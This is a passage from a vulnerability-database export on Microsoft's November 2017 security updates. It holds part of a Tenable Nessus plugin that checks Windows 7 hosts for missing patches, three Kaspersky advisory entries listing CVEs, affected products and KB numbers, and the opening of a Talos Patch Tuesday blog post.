the affected system. (CVE-2017-11832,\n CVE-2017-11835)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11791)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2017-11847)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2017-11831,\n CVE-2017-11849, CVE-2017-11853)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles page content, which\n could allow an attacker to detect the navigation of the\n user leaving a maliciously crafted page.\n (CVE-2017-11848)\n\n - A denial of service vulnerability exists when Windows\n Search improperly handles objects in memory. An attacker\n who successfully exploited the vulnerability could cause\n a remote denial of service against a system.\n (CVE-2017-11788)\n\n - A Win32k information disclosure vulnerability exists\n when the Windows GDI component improperly discloses\n kernel memory addresses. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11851,\n CVE-2017-11852)\");\n # https://support.microsoft.com/en-us/help/4048960/windows-7-update-kb4048960\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?46648b9c\");\n # https://support.microsoft.com/en-us/help/4048957/windows-7-update-kb4048957\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0ad6eb38\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4048960 or Cumulative update KB4048957.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11847\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-11\";\nkbs = make_list('4048960', '4048957');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:\"11_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4048960, 4048957])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-02T11:48:11", "bulletinFamily": "info", "cvelist": ["CVE-2017-11839", "CVE-2017-11871", "CVE-2017-11856", "CVE-2017-11862", "CVE-2017-11844", "CVE-2017-11834", "CVE-2017-11848", "CVE-2017-11836", "CVE-2017-11870", "CVE-2017-11840", "CVE-2017-11873", "CVE-2017-11872", "CVE-2017-11791", "CVE-2017-11837", "CVE-2017-11841", "CVE-2017-11838", "CVE-2017-11827", "CVE-2017-11845", "CVE-2017-11803", "CVE-2017-11869", "CVE-2017-11861", "CVE-2017-11863", "CVE-2017-11833", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11843", "CVE-2017-11874", "CVE-2017-11846", "CVE-2017-11866"], "description": "### *Detect date*:\n11/14/2017\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Edge and Internet Explorer. Malicious users can exploit these vulnerabilities to execute arbitrary code, bypass security restrictions and obtain sensitive information.\n\n### *Affected products*:\nMicrosoft Edge \nInternet Explorer 9 \nInternet Explorer 10 \nInternet Explorer 11\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-11791](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11791>) \n[CVE-2017-11803](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11803>) \n[CVE-2017-11827](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11827>) \n[CVE-2017-11833](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11833>) \n[CVE-2017-11834](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11834>) \n[CVE-2017-11836](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11836>) \n[CVE-2017-11837](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11837>) \n[CVE-2017-11838](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11838>) \n[CVE-2017-11839](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11839>) \n[CVE-2017-11840](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11840>) \n[CVE-2017-11841](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11841>) \n[CVE-2017-11843](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11843>) \n[CVE-2017-11844](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11844>) \n[CVE-2017-11845](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11845>) \n[CVE-2017-11846](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11846>) \n[CVE-2017-11848](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11848>) \n[CVE-2017-11855](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11855>) \n[CVE-2017-11856](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11856>) \n[CVE-2017-11858](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11858>) \n[CVE-2017-11861](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11861>) \n[CVE-2017-11862](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11862>) \n[CVE-2017-11863](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11863>) \n[CVE-2017-11866](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11866>) \n[CVE-2017-11869](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11869>) \n[CVE-2017-11870](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11870>) \n[CVE-2017-11871](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11871>) \n[CVE-2017-11872](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11872>) \n[CVE-2017-11873](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11873>) \n[CVE-2017-11874](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11874>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2017-11791](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11791>)3.1Warning \n[CVE-2017-11803](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11803>)4.3Warning \n[CVE-2017-11827](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11827>)9.3Critical \n[CVE-2017-11833](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11833>)2.6Warning \n[CVE-2017-11834](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11834>)2.6Warning \n[CVE-2017-11836](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11836>)7.5Critical \n[CVE-2017-11837](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11837>)7.5Critical \n[CVE-2017-11838](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11838>)7.5Critical \n[CVE-2017-11839](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11839>)7.6Critical \n[CVE-2017-11840](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11840>)7.5Critical \n[CVE-2017-11841](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11841>)7.5Critical \n[CVE-2017-11843](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11843>)7.5Critical \n[CVE-2017-11844](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11844>)4.3Warning \n[CVE-2017-11845](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11845>)7.6Critical \n[CVE-2017-11846](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11846>)7.5Critical \n[CVE-2017-11848](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11848>)4.3Warning \n[CVE-2017-11855](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11855>)7.6Critical \n[CVE-2017-11856](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11856>)7.6Critical \n[CVE-2017-11858](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11858>)7.5Critical \n[CVE-2017-11861](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11861>)7.5Critical \n[CVE-2017-11862](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11862>)7.5Critical \n[CVE-2017-11863](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11863>)4.3Warning \n[CVE-2017-11866](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11866>)7.5Critical \n[CVE-2017-11869](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11869>)7.6Critical \n[CVE-2017-11870](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11870>)7.5Critical \n[CVE-2017-11871](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11871>)7.5Critical \n[CVE-2017-11872](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11872>)4.3Warning \n[CVE-2017-11873](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11873>)7.5Critical \n[CVE-2017-11874](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11874>)3.1Warning\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4042895](<http://support.microsoft.com/kb/4042895>) \n[4048955](<http://support.microsoft.com/kb/4048955>) \n[4048952](<http://support.microsoft.com/kb/4048952>) \n[4048953](<http://support.microsoft.com/kb/4048953>) \n[4048954](<http://support.microsoft.com/kb/4048954>) \n[4048956](<http://support.microsoft.com/kb/4048956>) \n[4048957](<http://support.microsoft.com/kb/4048957>) \n[4048958](<http://support.microsoft.com/kb/4048958>) \n[4048959](<http://support.microsoft.com/kb/4048959>) \n[4047206](<http://support.microsoft.com/kb/4047206>)\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 41, "modified": "2020-06-18T00:00:00", "published": "2017-11-14T00:00:00", "id": "KLA11140", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11140", "title": "\r KLA11140Multiple vulnerabilities in Microsoft Edge and Internet Explorer ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T11:56:08", "bulletinFamily": "info", "cvelist": ["CVE-2017-11835", "CVE-2017-11880", "CVE-2017-11851", "CVE-2017-11834", "CVE-2017-11852", "CVE-2017-11848", "CVE-2017-11831", "CVE-2017-11791", "CVE-2017-11788", "CVE-2017-11869", "CVE-2017-11832", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11849", "CVE-2017-11843", "CVE-2017-11847", "CVE-2017-11853", "CVE-2017-11846", "CVE-2017-11768"], "description": "### *Detect date*:\n11/14/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Support Update). Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code, gain privileges, cause denial of service.\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:\n\n### *Affected products*:\nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 for 32-bit Systems \nInternet Explorer 9 \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 8.1 for x64-based systems \nWindows Server 2012 \nChakraCore \nInternet Explorer 11 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2016 \nWindows 10 Version 1709 for x64-based Systems \nWindows RT 8.1 \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows 10 Version 1703 for x64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows 10 Version 1511 for 32-bit Systems \nMicrosoft Edge (EdgeHTML-based) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1511 for x64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 1709 for 32-bit Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 10 Version 1703 for 32-bit Systems \nInternet Explorer 10 \nWindows Server 2012 R2\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-11831](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11831>) \n[CVE-2017-11849](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11849>) \n[CVE-2017-11855](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11855>) \n[CVE-2017-11832](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11832>) \n[CVE-2017-11835](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11835>) \n[CVE-2017-11791](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11791>) \n[CVE-2017-11851](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11851>) \n[CVE-2017-11869](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11869>) \n[CVE-2017-11848](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11848>) \n[CVE-2017-11843](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11843>) \n[CVE-2017-11852](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11852>) \n[CVE-2017-11853](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11853>) \n[CVE-2017-11846](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11846>) \n[CVE-2017-11847](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11847>) \n[CVE-2017-11788](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11788>) \n[CVE-2017-11880](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11880>) \n[CVE-2017-11768](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11768>) \n[CVE-2017-11858](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11858>) \n[CVE-2017-11834](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11834>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2017-11768](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11768>)0.0Unknown \n[CVE-2017-11788](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11788>)0.0Unknown \n[CVE-2017-11831](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11831>)0.0Unknown \n[CVE-2017-11832](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11832>)0.0Unknown \n[CVE-2017-11835](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11835>)0.0Unknown \n[CVE-2017-11847](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11847>)0.0Unknown \n[CVE-2017-11849](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11849>)0.0Unknown \n[CVE-2017-11851](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11851>)0.0Unknown \n[CVE-2017-11852](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11852>)0.0Unknown \n[CVE-2017-11853](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11853>)0.0Unknown \n[CVE-2017-11880](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11880>)0.0Unknown \n[CVE-2017-11791](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11791>)0.0Unknown \n[CVE-2017-11834](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11834>)0.0Unknown \n[CVE-2017-11843](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11843>)0.0Unknown \n[CVE-2017-11846](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11846>)0.0Unknown \n[CVE-2017-11848](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11848>)0.0Unknown \n[CVE-2017-11855](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11855>)0.0Unknown \n[CVE-2017-11858](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11858>)0.0Unknown \n[CVE-2017-11869](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11869>)0.0Unknown\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4046184](<http://support.microsoft.com/kb/4046184>) \n[4047211](<http://support.microsoft.com/kb/4047211>) \n[4048957](<http://support.microsoft.com/kb/4048957>) \n[4048960](<http://support.microsoft.com/kb/4048960>) \n[4048968](<http://support.microsoft.com/kb/4048968>) \n[4048970](<http://support.microsoft.com/kb/4048970>) \n[4049164](<http://support.microsoft.com/kb/4049164>) \n[4047170](<http://support.microsoft.com/kb/4047170>) \n[4047206](<http://support.microsoft.com/kb/4047206>)", "edition": 1, "modified": "2020-07-22T00:00:00", "published": "2017-11-14T00:00:00", "id": "KLA11855", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11855", "title": "\r KLA11855Multiple vulnerabilities in Microsoft Products (ESU) ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T11:48:10", "bulletinFamily": "info", "cvelist": ["CVE-2017-11880", "CVE-2017-11851", "CVE-2017-11842", "CVE-2017-11831", "CVE-2017-11830", "CVE-2017-11788", "CVE-2017-11832", "CVE-2017-11849", "CVE-2017-11847", "CVE-2017-11853", "CVE-2017-11850", "CVE-2017-11768"], "description": "### *Detect date*:\n11/14/2017\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to obtain sensitive information, cause denial of service, bypass security restrictions, gain privileges.\n\n### *Affected products*:\nWindows 10 for 32-bit Systems \nWindows 10 for x64-based Systems \nWindows 10 Version 1511 for 32-bit Systems \nWindows 10 Version 1511 for x64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 1703 for 32-bit Systems \nWindows 10 Version 1703 for x64-based Systems \nWindows 10 Version 1709 for 32-bit Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows 8.1 for x64-based systems \nWindows RT 8.1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2012 \nWindows Server 2012 (Server Core installation) \nWindows Server 2012 R2 \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2016 \nWindows Server 2016 (Server Core installation) \nWindows 10 Version 1709 for x64-based Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-11768](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11768>) \n[CVE-2017-11788](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11788>) \n[CVE-2017-11830](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11830>) \n[CVE-2017-11831](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11831>) \n[CVE-2017-11832](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11832>) \n[CVE-2017-11842](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11842>) \n[CVE-2017-11847](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11847>) \n[CVE-2017-11849](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11849>) \n[CVE-2017-11850](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11850>) \n[CVE-2017-11851](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11851>) \n[CVE-2017-11853](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11853>) \n[CVE-2017-11880](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11880>) \n\n\n### *Impacts*:\nOSI \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2017-11768](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11768>)0.0Unknown \n[CVE-2017-11788](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11788>)0.0Unknown \n[CVE-2017-11830](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11830>)0.0Unknown \n[CVE-2017-11831](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11831>)0.0Unknown \n[CVE-2017-11832](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11832>)0.0Unknown \n[CVE-2017-11842](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11842>)0.0Unknown \n[CVE-2017-11847](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11847>)0.0Unknown \n[CVE-2017-11849](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11849>)0.0Unknown \n[CVE-2017-11850](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11850>)0.0Unknown \n[CVE-2017-11851](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11851>)0.0Unknown \n[CVE-2017-11853](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11853>)0.0Unknown \n[CVE-2017-11880](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11880>)0.0Unknown\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4048955](<http://support.microsoft.com/kb/4048955>) \n[4048952](<http://support.microsoft.com/kb/4048952>) \n[4048953](<http://support.microsoft.com/kb/4048953>) \n[4048954](<http://support.microsoft.com/kb/4048954>) \n[4048956](<http://support.microsoft.com/kb/4048956>) \n[4048958](<http://support.microsoft.com/kb/4048958>) \n[4048959](<http://support.microsoft.com/kb/4048959>) \n[4048961](<http://support.microsoft.com/kb/4048961>) \n[4048962](<http://support.microsoft.com/kb/4048962>)\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 45, "modified": "2020-07-22T00:00:00", "published": "2017-11-14T00:00:00", "id": "KLA11136", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11136", "title": "\r KLA11136Multiple vulnerabilities in Microsoft Windows ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2017-12-25T19:52:52", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11768", "CVE-2017-11770", "CVE-2017-11788", "CVE-2017-11791", "CVE-2017-11803", "CVE-2017-11827", "CVE-2017-11830", "CVE-2017-11831", "CVE-2017-11832", "CVE-2017-11833", "CVE-2017-11834", "CVE-2017-11835", "CVE-2017-11836", "CVE-2017-11837", "CVE-2017-11838", "CVE-2017-11839", "CVE-2017-11840", "CVE-2017-11841", "CVE-2017-11842", "CVE-2017-11843", "CVE-2017-11844", "CVE-2017-11845", "CVE-2017-11846", "CVE-2017-11847", "CVE-2017-11848", "CVE-2017-11849", "CVE-2017-11850", "CVE-2017-11851", "CVE-2017-11852", "CVE-2017-11853", "CVE-2017-11854", "CVE-2017-11855", "CVE-2017-11856", "CVE-2017-11858", "CVE-2017-11861", "CVE-2017-11862", "CVE-2017-11863", "CVE-2017-11866", "CVE-2017-11869", "CVE-2017-11870", "CVE-2017-11871", "CVE-2017-11872", "CVE-2017-11873", "CVE-2017-11874", "CVE-2017-11876", "CVE-2017-11877", "CVE-2017-11878", "CVE-2017-11879", "CVE-2017-11880", "CVE-2017-11882", "CVE-2017-11883", "CVE-2017-11884", "CVE-2017-16367", "CVE-2017-8700"], "description": "Microsoft has released its monthly set of security advisories for vulnerabilities that have been identified and addressed in various products. This month's advisory release addresses 53 new vulnerabilities with 19 of them rated critical, 31 of them rated important and 3 of them rated moderate. These vulnerabilities impact Microsoft Edge, Internet Explorer, Microsoft Scripting Engine, and more.<br /><br />In addition, an update for Adobe Reader was released which addresses CVE-2017-16367 / TALOS-2017-0356 - Adobe Acrobat Reader DC PDF Structured Hierarchy ActualText Structure Element Code Execution Vulnerability which was discovered by Aleksandar Nikolic of Cisco Talos. This vulnerability manifests as a type confusion vulnerability in the PDF parsing functionality for documents containing marked structure elements. A specifically crafted PDF document designed to trigger the vulnerability could cause an out-of-bounds access on the heap, potentially leading to arbitrary code execution. More details regarding this vulnerability are available <a href=\"https://talosintelligence.com/vulnerability_reports/TALOS-2017-0356\">here</a>.<br /><br /><a name='more'></a><h2 